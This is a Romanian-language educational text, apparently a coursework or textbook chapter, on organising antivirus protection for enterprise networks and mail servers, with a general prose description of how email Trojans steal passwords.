Pericolul de infectare a rețelelor de calculatoare este real pentru orice întreprindere, dar o epidemie de virus se poate dezvolta cu adevărat în rețelele locale ale marilor complexe economice și industriale cu o infrastructură ramificată teritorial. Rețelele lor de calculatoare, de regulă, au fost create în etape, folosind diverse hardware și software. Evident, pentru astfel de întreprinderi, problema protecției antivirus devine foarte dificilă, nu doar tehnic, ci și financiar.

În același timp, soluția acestei probleme se realizează printr-o combinație de măsuri organizaționale și soluții software și hardware. Această abordare nu necesită costuri tehnice și financiare imediate mari și poate fi utilizată pentru protecția antivirus cuprinzătoare a rețelei locale a oricărei întreprinderi.

Următoarele principii pot servi ca bază pentru construirea unui astfel de sistem de protecție antivirus:

Principiul implementării unei politici tehnice unificate atunci când se justifică alegerea produselor antivirus pentru diferite segmente ale rețelei locale;

Principiul acoperirii complete a întregii rețele locale a organizației de către sistemul de protecție antivirus;

Principiul continuității controlului rețelei locale a întreprinderii, pentru detectarea la timp a infecțiilor computerului;

Principiul managementului centralizat al protecției antivirus;

Principiul implementării unei politici tehnice unificate prevede utilizarea în toate segmentele rețelei locale numai a software-ului antivirus recomandat de departamentul de protecție antivirus al întreprinderii. Această politică este pe termen lung, aprobată de conducerea întreprinderii și stă la baza planificării țintite și pe termen lung a costurilor pentru achiziționarea de produse software antivirus și actualizarea ulterioară a acestora.

Principiul acoperirii complete a rețelei locale de către sistemul de protecție anti-virus prevede introducerea treptată a software-ului de protecție anti-virus în rețea până când aceasta este complet saturată, în combinație cu măsuri organizaționale și de protecție a informațiilor de regim.

Principiul controlului continuu asupra stării antivirus a unei rețele locale presupune o astfel de organizare a protecției acesteia, care oferă o posibilitate constantă de monitorizare a stării rețelei pentru a detecta viruși.

Principiul managementului centralizat al protecției antivirus prevede gestionarea sistemului dintr-un singur corp folosind hardware și software. Este acest organism care organizează controlul centralizat în rețea, primește date de control sau rapoarte de la utilizatori de la locurile lor de muncă privind detectarea virușilor și asigură implementarea deciziile luate pentru gestionarea sistemului de protectie antivirus.Protecția antivirus a rețelei locale a unei organizații mari este o problemă complexă care nu se poate reduce la o simplă instalare a produselor antivirus. De regulă, este necesară crearea unui subsistem separat. În termeni tehnici, atunci când se rezolvă această problemă, trebuie acordată o atenție deosebită testării tuturor programelor antivirus nou achiziționate, precum și instalării pachetelor antivirus pe serverele de e-mail. 3 Software antivirus pentru servere de mail

Dacă în zorii dezvoltării tehnologiei informatice principalul canal de răspândire a virușilor era schimbul de fișiere de program prin intermediul dischetelor, astăzi palma aparține e-mail-ului. E-mailul este un instrument convenabil și indispensabil comunicare de afaceri. Cu toate acestea, majoritatea virușilor și spam-ului sunt distribuite prin e-mail și poate fi un canal pentru scurgerea datelor confidențiale. În fiecare zi, milioane și milioane de mesaje sunt transmise prin canalele sale, iar multe dintre aceste mesaje sunt infectate cu viruși.

Din păcate, fișierele atașate trimise cu mesaje de e-mail pot fi, de asemenea, extrem de dăunătoare sănătății computerului dvs. Care este pericolul fișierelor atașate? Ca atare fișier, utilizatorului i se poate trimite un virus sau un program troian sau un document în format Microsoft Office (*.doc, *.xls) infectat cu un virus de calculator. Prin rularea programului rezultat pentru execuție sau deschiderea unui document pentru vizualizare, utilizatorul poate iniția un virus sau poate instala un program troian pe computerul său. Mai mult, din cauza setărilor incorecte ale programului de e-mail sau a erorilor din acesta, fișierele atașate se pot deschide automat la vizualizarea conținutului scrisorilor primite. În acest caz, dacă nu luați nicio măsură de protecție, pătrunderea virușilor sau a altor programe rău intenționate în computerul dvs. este o chestiune de timp.Alte încercări de a pătrunde în computerul dvs. prin e-mail sunt posibile. De exemplu, ar putea trimite un mesaj sub forma unui document HTML care are încorporat un control Troian ActiveX. Prin deschiderea unui astfel de mesaj, puteți descărca acest element pe computerul dvs., după care va începe imediat să-și facă treaba Troian de e-mail - Troieni care vă permit să „scoateți” parolele și alte informații din fișierele de pe computer și trimite-le prin e-mail proprietarului. Acestea pot fi date de conectare ale furnizorului și parole de internet, parola cutiei poștale, parole ICQ și IRC etc. Pentru a trimite o scrisoare proprietarului prin poștă, troianul contactează serverul de e-mail al site-ului prin protocolul SMTP (de exemplu, smtp.mail.ru). După colectarea datelor necesare, troianul va verifica dacă datele au fost trimise. Dacă nu, datele sunt trimise și stocate în registru. Dacă acestea au fost deja trimise, atunci scrisoarea anterioară este preluată din registru și este comparată cu cea actuală. Dacă au existat modificări în informații (au apărut date noi), atunci scrisoarea este trimisă și datele proaspete despre parole sunt înregistrate în registru. Într-un cuvânt, acest tip de troian pur și simplu colectează informații, iar victima poate nici să nu-și dea seama că cineva le cunoaște deja parolele.Arhiva unui astfel de troian conține de obicei 4 fișiere: server editor (configurator), troian server, packer (gluer). ) fișiere, instrucțiuni de utilizare. În urma lucrării, se pot determina următoarele date: 1) adresa IP a computerului victimei; 2) cele mai detaliate informații despre sistem (numele computerului și utilizatorul, Versiunea Windows , modem etc.); 3) toate parolele memorate în cache; 4) toate setările de conexiune telefonică, inclusiv numerele de telefon, autentificarea și parolele; 5) parolele ICQ; 6) numărul de site-uri recent vizitate. Pe lângă măsurile pur administrative, să combate virușii și alte programe rău intenționate, trebuie să utilizați software antivirus special (antivirusuri).Pentru a vă proteja împotriva virușilor care se răspândesc prin e-mail, puteți instala antivirusuri pe computerele expeditorului și destinatarului. Cu toate acestea, această protecție adesea nu este suficientă. Antivirusurile convenționale instalate pe computerele utilizatorilor de internet sunt concepute pentru a scana fișiere și nu sunt întotdeauna capabile să analizeze fluxul de date de e-mail. Dacă antivirusul nu scanează automat toate fișierele deschise, atunci un virus sau un troian poate pătrunde cu ușurință prin protecție pe discul computerului.În plus, eficacitatea antivirusurilor depinde foarte mult de respectarea regulilor de utilizare: este necesar pentru a actualiza periodic baza de date antivirus, utilizați setările corecte ale scanerului antivirus etc. Din păcate, mulți proprietari de computere nu știu să folosească corect antivirusurile sau nu actualizează baza de date antivirus, ceea ce duce inevitabil la infectarea cu virusuri.Înțelegând relevanța problemei răspândirii virușilor prin e-mail, multe companii oferă antivirusuri speciale. programe de virus pentru a proteja serverele de mail. Astfel de antivirusuri analizează fluxul de date care trece prin serverul de e-mail, împiedicând transmiterea mesajelor cu fișiere atașate infectate. Există o altă soluție - conectarea la servere de e-mail cu antivirusuri convenționale concepute pentru a scana fișiere Protecția antivirus a serverelor de e-mail SMTP și POP3 este mult mai eficientă decât protecția antivirus a computerelor utilizatorilor. De regulă, un administrator cu experiență este responsabil pentru configurarea antivirusurilor pe server, care nu va greși la configurare și, în plus, va activa modul de actualizare automată a bazei de date prin Internet. Utilizatorii serverelor securizate SMTP și POP3 nu trebuie să-și facă griji cu privire la canalul principal de răspândire a virușilor - vor primi mesaje care au fost deja curățate de viruși.Acțiunile efectuate de serverele de e-mail atunci când trimit și primesc mesaje infectate depind de setările antivirus și serverul de e-mail însuși. De exemplu, atunci când un expeditor încearcă să trimită un mesaj cu un fișier infectat, serverul de e-mail securizat SMTP va refuza să facă acest lucru și programul de e-mail va afișa un mesaj de avertizare. Dacă cineva vă trimite un e-mail cu un fișier atașat infectat, atunci când utilizați un server POP3 securizat, va fi primit în schimb doar un mesaj despre detectarea unui virus. În ciuda popularității tot mai mari a platformei Microsoft Windows, astăzi majoritatea serverelor de Internet rulează Linux sisteme de operare, FreeBSD și sisteme similare de tip UNIX. Principalul avantaj al Linux este costul de achiziție foarte scăzut. Oricine poate descărca o distribuție Linux de pe Internet și o poate instala pe orice număr de computere. Această distribuție are tot ce aveți nevoie pentru a crea un nod de internet, inclusiv servere de e-mail. situatii dificile, telecomandă simplă folosind o consolă text etc. Pentru sistemul de operare din această serie, au fost creați doar câteva zeci de viruși, ceea ce indică securitatea ridicată a acestuia.

4 Kaspersky Anti-Virus